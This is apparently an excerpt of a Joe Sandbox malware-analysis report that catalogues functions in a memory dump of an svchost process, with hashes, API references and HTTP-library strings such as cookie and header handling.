                                                                • Instruction ID: 77ff13f6762f33691f13fbba1c229401c642eaefc8e872036f483701cf1fa303
                                                                • Opcode Fuzzy Hash: 7a8e5cfe7a1db2edb1b6a494e2eb3a7716bf34f0730d2bffec29c10d8b21fb3e
                                                                • Instruction Fuzzy Hash: B8B12A7A209B4486EB758B69D8403ECA7F5E704F98FD84215CEAD07394FB39C959EB00
                                                                Function 00000173D016A782 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 231COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdup
                                                                • String ID: application/octet-stream$k
                                                                • API String ID: 2653869212-2522224428
                                                                • Opcode ID: 2a92e434845d3c94a234db9cc82dc5f49bf461cb96b319b5a31757b7054bf419
                                                                • Instruction ID: 9875f67b24fb846cd50306c4c2cb9a61bc310ce28ba57ea503b0c015533b3148
                                                                • Opcode Fuzzy Hash: 2a92e434845d3c94a234db9cc82dc5f49bf461cb96b319b5a31757b7054bf419
                                                                • Instruction Fuzzy Hash: EEB12A7A209B4486EB758B69D8503EDA7B5E704F98FD80215CEAD06394FB39C958EB00
                                                                Function 00000173D01727E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 181COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdupmalloc
                                                                • String ID: %s?%s$Failed sending Gopher request
                                                                • API String ID: 111713529-132698833
                                                                • Opcode ID: 27f1859d9793bf00524c1d5affff30fe9c262b0222979bbcb1fc6aabb92e09fb
                                                                • Instruction ID: 24617c839bdbc785e65c012db53df2ce9c6a14f121b1c4e504b4dbd9c23119c7
                                                                • Opcode Fuzzy Hash: 27f1859d9793bf00524c1d5affff30fe9c262b0222979bbcb1fc6aabb92e09fb
                                                                • Instruction Fuzzy Hash: 8F61747A30969482FB619BA6E4403D9A6A0A785FF4F840321DF7D477D5FB38C687A700
                                                                Function 00000173D019585B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: ALL$FLUSH$RELOAD$SESS$Set-Cookie:
                                                                • API String ID: 1294909896-1147549499
                                                                • Opcode ID: 103b107586fa9227b45bf145222309df3821b1e95c9e2af278b0af28645039d7
                                                                • Instruction ID: f950f0c84397d9f0d5f624cffe5e3075b823acbaabdcd7b7b6e401ea3a8c0b5f
                                                                • Opcode Fuzzy Hash: 103b107586fa9227b45bf145222309df3821b1e95c9e2af278b0af28645039d7
                                                                • Instruction Fuzzy Hash: DF414FB930D65081FA78A7A2E9517EED271AB81FD0FC04115DDBF46AC6FF28C642A311
                                                                Function 00000173D01707F0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _strdup$callocfreestrrchr
                                                                • String ID: Wildcard - Parsing started
                                                                • API String ID: 2641349667-2475583933
                                                                • Opcode ID: 44ab88a669aa04c62231100cdfcaf3a3da64f94eca007dd566c131d75bcdbf31
                                                                • Instruction ID: fd31dabfd2af994f080d6e9c757512ddfc1f821c764752b1f99076babb922a95
                                                                • Opcode Fuzzy Hash: 44ab88a669aa04c62231100cdfcaf3a3da64f94eca007dd566c131d75bcdbf31
                                                                • Instruction Fuzzy Hash: 5F41573A609B82C6FB66DB95E40439DA7B0F788B84F844024DBAD47792FF38C665D340
                                                                Function 00000173D01614F0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_time64
                                                                • String ID: ?
                                                                • API String ID: 3087401894-1684325040
                                                                • Opcode ID: ede764a78d3ca367c2767017dfa413e1f286ce038fd3d8e2205f52a6027f1c88
                                                                • Instruction ID: 4f856aba80dde0af4a3f2fbf3d4fc1657643e8c6aa20dbae0ef5d2f44cc3a3cb
                                                                • Opcode Fuzzy Hash: ede764a78d3ca367c2767017dfa413e1f286ce038fd3d8e2205f52a6027f1c88
                                                                • Instruction Fuzzy Hash: BC31EC3A609A5185EA708F62E8402ADE3B4F789FE4F980525DE7E47B58EF38C5419700
                                                                Function 00000173D01AA348 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 268stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: freestrncmp
                                                                • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$file$file://%s%s%s$https$xn--
                                                                • API String ID: 1891267927-4130347283
                                                                • Opcode ID: bb1c2040727a8c6a5536ab0f08df1104da565601866446cf42d0101fceef3854
                                                                • Instruction ID: a3a8eb9edb5d47e0857be9de641f6375ed7d9726b4060f7f1485ee52ad3c0049
                                                                • Opcode Fuzzy Hash: bb1c2040727a8c6a5536ab0f08df1104da565601866446cf42d0101fceef3854
                                                                • Instruction Fuzzy Hash: 3DC16E3A60DB8096EA758B91E5403DAE3F0F744BC4FC840169AAD53B95FF38D65AE700
                                                                Function 00000173D017D340 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 192stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: strchr
                                                                • String ID: %zx$0$0$Malformatted trailing header, skipping trailer$http_chunk, added last chunk with trailers from client -> %d$http_chunk, added last, empty chunk$http_chunk, made chunk of %zu bytes -> %d$operation aborted by trailing headers callback
                                                                • API String ID: 2830005266-126491959
                                                                • Opcode ID: abe3ceb02854391a74cf306b8dc7cfb45ab71d0b1b1fc80b9ca78811a5754175
                                                                • Instruction ID: 8040a1c7069580d0a79b6cdce9c756f6b447c416f29002016660d83f2d13d2dc
                                                                • Opcode Fuzzy Hash: abe3ceb02854391a74cf306b8dc7cfb45ab71d0b1b1fc80b9ca78811a5754175
                                                                • Instruction Fuzzy Hash: E081A07A60CA4492EB70DBA5E4447DAA3B0E385FD4FC44012EA6E87695FF38C74AD700
                                                                Function 00000173D0183800 Relevance: 13.6, APIs: 9, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7c8dc4a0aaf0ad9003701c7c8bbbc3a3aec79601f338a5ba5a9cbfc21c16228b
                                                                • Instruction ID: 189a74493b4de2f90dc2e7a1741732ed7aeb8ace7fbbbdf1d9390f4426c6c179
                                                                • Opcode Fuzzy Hash: 7c8dc4a0aaf0ad9003701c7c8bbbc3a3aec79601f338a5ba5a9cbfc21c16228b
                                                                • Instruction Fuzzy Hash: DF418E3960AB5191FB34DB91E5843E8A3B1AB49FE4F880224DD6D03794FF7CCA41A340
                                                                Function 00000173D01764E7 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$SimpleString::operator=
                                                                • String ID: %s?%s$Accept-Encoding$Accept-Encoding: %s$POST$Referer$Referer: %s
                                                                • API String ID: 1621822926-997604947
                                                                • Opcode ID: dd1f404e633f12ecf2762c7c30f49c178b6249a10c20961f453e78add58c1093
                                                                • Instruction ID: 8f151758df0d4680d379df0166947d0379c6252c630f3ab6d217c8fe0f32c257
                                                                • Opcode Fuzzy Hash: dd1f404e633f12ecf2762c7c30f49c178b6249a10c20961f453e78add58c1093
                                                                • Instruction Fuzzy Hash: 44412A79209B8080EB769BA0D4503D9A6F4F789FD8FC84139DE6D4A689FF38C655E310
                                                                Function 00000173D01764F0 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$SimpleString::operator=
                                                                • String ID: %s?%s$Accept-Encoding$Accept-Encoding: %s$PUT$Referer$Referer: %s
                                                                • API String ID: 1621822926-4091559278
                                                                • Opcode ID: 7b140460cf876aba7226aacabe40a2d78e3099877e0fa5f31f295fa9c093a4e9
                                                                • Instruction ID: 065b67700ba7203ecac87ef8c1b99c8eb01cacd96e1c561044ffca345616fa7c
                                                                • Opcode Fuzzy Hash: 7b140460cf876aba7226aacabe40a2d78e3099877e0fa5f31f295fa9c093a4e9
                                                                • Instruction Fuzzy Hash: 3B412A79209B8080EB769BA0D4503D9A6B4F789FD8FC84139DE6D4A689FF38C655E310
                                                                Function 00000173D01683F0 Relevance: 12.2, APIs: 8, Instructions: 199COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _strdupfree$callocmemset$mallocmemmove
                                                                • String ID:
                                                                • API String ID: 3958593022-0
                                                                • Opcode ID: dff4d43b1f82b3be16d3f5602984e88871eb33e8f07b2bcaf38b4029c8e1b8cb
                                                                • Instruction ID: 5ca3562ca82e9f5e6709dd10da05355e4ad378308b5dd3f92c4b0e39f416c54a
                                                                • Opcode Fuzzy Hash: dff4d43b1f82b3be16d3f5602984e88871eb33e8f07b2bcaf38b4029c8e1b8cb
                                                                • Instruction Fuzzy Hash: CCA15D39209B8181EB699FA5D8503EDA3B0EB45FD8FC842359A7D4B6C6FF34D2509321
                                                                Function 00000173D01B57E0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdupinet_pton$calloc
                                                                • String ID:
                                                                • API String ID: 1961295042-0
                                                                • Opcode ID: 7066de9b0697eea2c7ffd98562010f7cf58f24a0038b9dd01b2d900d99e75690
                                                                • Instruction ID: 83cb8b458af83378b4c9a9a450b4a032164f1d9cb588e437c3524769157279ed
                                                                • Opcode Fuzzy Hash: 7066de9b0697eea2c7ffd98562010f7cf58f24a0038b9dd01b2d900d99e75690
                                                                • Instruction Fuzzy Hash: A8518F3A209B80C2EB268F96D4503A8B7B0F759FD4F884125CB6D07791EF38C6A1A700
                                                                Function 00000173D0164630 Relevance: 12.1, APIs: 8, Instructions: 103COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00000173D01626D0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D0162705
                                                                  • Part of subcall function 00000173D01626D0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D0162718
                                                                  • Part of subcall function 00000173D01626D0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D016273F
                                                                  • Part of subcall function 00000173D01626D0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D016274C
                                                                • wcschr.VCRUNTIME140 ref: 00000173D0164691
                                                                • _wcsdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01646BD
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01646FB
                                                                • wcsncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D0164716
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0164734
                                                                • _wcsdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D016474D
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0164779
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D016478E
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$ByteCharMultiWide_wcsdupmalloc$wcschrwcsncpy
                                                                • String ID:
                                                                • API String ID: 3696254116-0
                                                                • Opcode ID: 8620fd48158dc7c22be04266da9e9dbd57cb15bb93cfff5a3d7557f6419d7bf0
                                                                • Instruction ID: d1b7a21aafbb571d2ee79f90acecb30a0dd716ae5621e87d9891188d3f5e3ce8
                                                                • Opcode Fuzzy Hash: 8620fd48158dc7c22be04266da9e9dbd57cb15bb93cfff5a3d7557f6419d7bf0
                                                                • Instruction Fuzzy Hash: 9B41C439609B5082EE21DF92E8047AAA3B0F74AFD4FC94625DD2E07791FF38D1859300
                                                                Function 00000173D017B6A0 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 178COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D017B7C1
                                                                  • Part of subcall function 00000173D0182510: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0182547
                                                                  • Part of subcall function 00000173D0182510: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0182557
                                                                  • Part of subcall function 00000173D0182510: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0182565
                                                                  • Part of subcall function 00000173D0182510: memset.VCRUNTIME140 ref: 00000173D018259B
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D017B81E
                                                                  • Part of subcall function 00000173D0194030: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0194047
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$calloc$memset
                                                                • String ID: Content-Type$Transfer-Encoding$Transfer-Encoding:$chunked$multipart/form-data
                                                                • API String ID: 2591755499-1003861500
                                                                • Opcode ID: 816db0b0b0f91339b2475bf9136076f41c8bbafb1aa664cac9532527c286d9ca
                                                                • Instruction ID: 7e98543b869184ca19f1136ccb7b223c929e24283cfc3ac6798c9c6b6b449d71
                                                                • Opcode Fuzzy Hash: 816db0b0b0f91339b2475bf9136076f41c8bbafb1aa664cac9532527c286d9ca
                                                                • Instruction Fuzzy Hash: D471983A60864081EB298B5AE5943E9A3B1E7C5FC8F9C0035DF2D0B7D9FF29CA409300
                                                                Function 00000173D0160600 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D016063B
                                                                  • Part of subcall function 00000173D0162830: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000173D0151F41), ref: 00000173D0162865
                                                                  • Part of subcall function 00000173D0162830: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000173D0151F41), ref: 00000173D0162886
                                                                  • Part of subcall function 00000173D0162830: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000173D0151F41), ref: 00000173D0162894
                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00000173D0160688
                                                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00000173D01607B4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$__acrt_iob_func_wfopencallocfclose
                                                                • String ID: -$Set-Cookie:$WARNING: failed to open cookie file "%s"
                                                                • API String ID: 1265547967-2358014132
                                                                • Opcode ID: 0421751e81405401c853245beb07fbe5ad2a70d4e1bd7c9dcffa53bd47de7ac0
                                                                • Instruction ID: 49a492fd874e84c2c6c2d756578ec5ca4f62b71d4f15346ef97fe03f4752d5d0
                                                                • Opcode Fuzzy Hash: 0421751e81405401c853245beb07fbe5ad2a70d4e1bd7c9dcffa53bd47de7ac0
                                                                • Instruction Fuzzy Hash: 0651C03920879141EA769B61E8103EEE6A1B782FD0FC84111DEBD07BC6FB39C651E700
                                                                Function 00000173D0180500 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _strdupstrcspn
                                                                • String ID: %s%s$() {%*]\"$LIST "%s" *
                                                                • API String ID: 3695213020-1363964841
                                                                • Opcode ID: 4c0b89fa279ba62d6b696ebe0fac23c78ba0318a377c95cdb86f7bd5457708f7
                                                                • Instruction ID: 29c940c6768f8c372b6944929edff8b5fb0d20f10bec4529d1923655bdd3ae1d
                                                                • Opcode Fuzzy Hash: 4c0b89fa279ba62d6b696ebe0fac23c78ba0318a377c95cdb86f7bd5457708f7
                                                                • Instruction Fuzzy Hash: 3741913920C68A91EBB28B95E4803DDE7B0AB45FD4FC80121DA6D077D5FB6CC741AB50
                                                                Function 00000173D0177440 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _gmtime64
                                                                • String ID: %s: %s, %02d %s %4d %02d:%02d:%02d GMT$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified
                                                                • API String ID: 1355024304-4153637960
                                                                • Opcode ID: 5a0679d5686de0adceff9f51d142b256cbefe22dce193e245b42af48054b9b40
                                                                • Instruction ID: 631d82509e44603971802a474968dff261a90926ac0c1785d8e5285c80242a5a
                                                                • Opcode Fuzzy Hash: 5a0679d5686de0adceff9f51d142b256cbefe22dce193e245b42af48054b9b40
                                                                • Instruction Fuzzy Hash: AC411E3920CB8186E770DB95E4503DAE7B1F38ABC0F940126EA5E47B99EB79D641DB00
                                                                Function 00000173D0167430 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 461stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
